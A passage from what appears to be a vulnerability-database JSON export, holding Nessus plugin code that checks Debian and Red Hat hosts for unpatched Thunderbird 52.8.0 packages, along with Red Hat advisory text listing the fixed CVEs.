reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-sk\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-sl\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-sq\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-sr\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-sv-se\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-ta-lk\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-tr\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-uk\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-vi\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-zh-cn\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-l10n-zh-tw\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-ar\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-ast\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-be\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-bg\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-bn-bd\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-br\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-ca\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-cs\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-cy\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-da\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-de\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-dsb\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-el\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-en-gb\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-es-ar\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-es-es\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-et\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-eu\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-fi\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-fr\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-fy-nl\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-ga-ie\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-gd\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-gl\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-he\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-hr\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-hsb\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-hu\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-hy-am\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-id\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-is\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-it\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-ja\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-kab\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-ko\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-lt\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-nb-no\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-nl\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-nn-no\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-pa-in\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-pl\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-pt-br\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-pt-pt\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-rm\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-ro\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-ru\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-si\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-sk\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-sl\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-sq\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-sr\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-sv-se\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-ta-lk\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-tr\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-uk\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-vi\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-zh-cn\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lightning-l10n-zh-tw\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-dbg\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-dev\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-all\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-ar\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-ast\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-be\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-bg\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-bn-bd\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-br\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-ca\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-cs\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-da\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-de\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-dsb\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-el\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-en-gb\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-es-ar\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-es-es\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-et\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-eu\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-fi\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-fr\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-fy-nl\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-ga-ie\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-gd\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-gl\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-he\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-hr\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-hsb\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-hu\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-hy-am\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-id\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-is\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-it\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-ja\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-kab\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-ko\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-lt\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-nb-no\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-nl\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-nn-no\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-pa-in\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-pl\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-pt-br\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-pt-pt\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-rm\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-ro\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-ru\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-si\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-sk\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-sl\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-sq\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-sr\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-sv-se\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-ta-lk\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-tr\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-uk\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-vi\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-zh-cn\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"thunderbird-l10n-zh-tw\", reference:\"1:52.8.0-1~deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-31T20:16:07", "description": "An update for thunderbird is now available for Red Hat Enterprise\nLinux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 52.8.0.\n\nSecurity Fix(es) :\n\n* Mozilla: Memory safety bugs fixed in Firefox 60 and Firefox ESR 52.8\n(CVE-2018-5150)\n\n* Mozilla: Backport critical security fixes in Skia (CVE-2018-5183)\n\n* Mozilla: Use-after-free with SVG animations and clip paths\n(CVE-2018-5154)\n\n* Mozilla: Use-after-free with SVG animations and text paths\n(CVE-2018-5155)\n\n* Mozilla: Integer overflow and out-of-bounds write in Skia\n(CVE-2018-5159)\n\n* Mozilla: Full plaintext recovery in S/MIME via chosen-ciphertext\nattack (CVE-2018-5184)\n\n* Mozilla: Hang via malformed headers (CVE-2018-5161)\n\n* Mozilla: Encrypted mail leaks plaintext through src attribute\n(CVE-2018-5162)\n\n* Mozilla: Lightweight themes can be installed without user\ninteraction (CVE-2018-5168)\n\n* Mozilla: Filename spoofing for external attachments (CVE-2018-5170)\n\n* Mozilla: Buffer overflow during UTF-8 to Unicode string conversion\nthrough legacy extension (CVE-2018-5178)\n\n* Mozilla: Leaking plaintext through HTML forms (CVE-2018-5185)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.\n\nRed Hat would like to thank the Mozilla project for reporting\nCVE-2018-5150, CVE-2018-5154, CVE-2018-5155, CVE-2018-5159,\nCVE-2018-5168, CVE-2018-5178, and CVE-2018-5183. Upstream acknowledges\nChristoph Diehl, Randell Jesup, Tyson Smith, Alex Gaynor, Ronald\nCrane, Julian Hector, Kannan Vijayan, Jason Kratzer, Mozilla\nDevelopers, Nils, Ivan Fratric, Wladimir Palant, and Root Object as\nthe original reporters.", "edition": 20, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-25T00:00:00", "title": "RHEL 7 : thunderbird (RHSA-2018:1725)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5162", "CVE-2018-5155", "CVE-2018-5170", "CVE-2018-5183", "CVE-2018-5185", "CVE-2018-5154", "CVE-2018-5168", "CVE-2018-5161", "CVE-2018-5184", "CVE-2018-5159"], "modified": "2018-05-25T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:thunderbird", "cpe:/o:redhat:enterprise_linux:7.7", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:thunderbird-debuginfo", "cpe:/o:redhat:enterprise_linux:7.6"], "id": "REDHAT-RHSA-2018-1725.NASL", "href": "https://www.tenable.com/plugins/nessus/110119", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:1725. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110119);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/29\");\n\n script_cve_id(\"CVE-2018-5150\", \"CVE-2018-5154\", \"CVE-2018-5155\", \"CVE-2018-5159\", \"CVE-2018-5161\", \"CVE-2018-5162\", \"CVE-2018-5168\", \"CVE-2018-5170\", \"CVE-2018-5178\", \"CVE-2018-5183\", \"CVE-2018-5184\", \"CVE-2018-5185\");\n script_xref(name:\"RHSA\", value:\"2018:1725\");\n\n script_name(english:\"RHEL 7 : thunderbird (RHSA-2018:1725)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"An update for thunderbird is now available for Red Hat Enterprise\nLinux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 52.8.0.\n\nSecurity Fix(es) :\n\n* Mozilla: Memory safety bugs fixed in Firefox 60 and Firefox ESR 52.8\n(CVE-2018-5150)\n\n* Mozilla: Backport critical security fixes in Skia (CVE-2018-5183)\n\n* Mozilla: Use-after-free with SVG animations and clip paths\n(CVE-2018-5154)\n\n* Mozilla: Use-after-free with SVG animations and text paths\n(CVE-2018-5155)\n\n* Mozilla: Integer overflow and out-of-bounds write in Skia\n(CVE-2018-5159)\n\n* Mozilla: Full plaintext recovery in S/MIME via chosen-ciphertext\nattack (CVE-2018-5184)\n\n* Mozilla: Hang via malformed headers (CVE-2018-5161)\n\n* Mozilla: Encrypted mail leaks plaintext through src attribute\n(CVE-2018-5162)\n\n* Mozilla: Lightweight themes can be installed without user\ninteraction (CVE-2018-5168)\n\n* Mozilla: Filename spoofing for external attachments (CVE-2018-5170)\n\n* Mozilla: Buffer overflow during UTF-8 to Unicode string conversion\nthrough legacy extension (CVE-2018-5178)\n\n* Mozilla: Leaking plaintext through HTML forms (CVE-2018-5185)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.\n\nRed Hat would like to thank the Mozilla project for reporting\nCVE-2018-5150, CVE-2018-5154, CVE-2018-5155, CVE-2018-5159,\nCVE-2018-5168, CVE-2018-5178, and CVE-2018-5183. Upstream acknowledges\nChristoph Diehl, Randell Jesup, Tyson Smith, Alex Gaynor, Ronald\nCrane, Julian Hector, Kannan Vijayan, Jason Kratzer, Mozilla\nDevelopers, Nils, Ivan Fratric, Wladimir Palant, and Root Object as\nthe original reporters.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2018:1725\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-5150\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-5154\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-5155\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-5159\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-5161\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-5162\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-5168\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-5170\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-5178\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-5183\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-5184\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-5185\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected thunderbird and / or thunderbird-debuginfo\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:thunderbird-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:1725\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"thunderbird-52.8.0-1.el7_5\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"thunderbird-debuginfo-52.8.0-1.el7_5\", allowmaj:TRUE)) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"thunderbird / thunderbird-debuginfo\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-31T17:00:54", "description": "The following CVEs are fixed in the updated thunderbird package :\n\nCVE-2018-5161 : Hang via malformed headers\n\nCVE-2018-5162 : Encrypted mail leaks plaintext through src attribute\n\nCVE-2018-5183 : Backport critical security fixes in Skia\n\nCVE-2018-5155 : Use-after-free with SVG animations and text paths\n\nCVE-2018-5170 : Filename spoofing for external attachments\n\nCVE-2018-5184 : Full plaintext recovery in S/MIME 